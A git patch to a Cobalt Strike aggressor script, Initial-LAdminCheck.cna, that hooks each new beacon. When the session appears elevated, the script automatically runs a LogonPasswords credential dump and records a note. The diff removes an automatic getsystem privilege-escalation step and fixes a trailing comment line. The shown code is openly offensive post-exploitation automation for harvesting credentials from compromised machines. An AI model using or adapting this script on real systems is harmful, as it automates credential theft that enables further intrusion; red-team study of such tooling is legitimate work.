From 30d64ffe6238ce1052530fdd14ca72410334be80 Mon Sep 17 00:00:00 2001 From: Alexander Rymdeko-Harvey Date: Fri, 1 Jul 2016 09:22:49 -0400 Subject: [PATCH] Update Initial-LAdminCheck.cna --- Initial-LAdminCheck.cna | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Initial-LAdminCheck.cna b/Initial-LAdminCheck.cna index 9c40efe..3b83b59 100644 --- a/Initial-LAdminCheck.cna +++ b/Initial-LAdminCheck.cna @@ -23,7 +23,6 @@ on beacon_initial { $b = "*"; if ($b isin $a) { - bgetsystem($1); blogonpasswords($1); beacon_note($1, "Elevated Context: Ran LogonPasswords"); } @@ -51,4 +50,4 @@ on beacon_output { # All intial beacons run script # event triggers on output # if it matches known string it executes logic -# if intial matches a * in name it executes logic \ No newline at end of file +# if intial matches a * in name it executes logic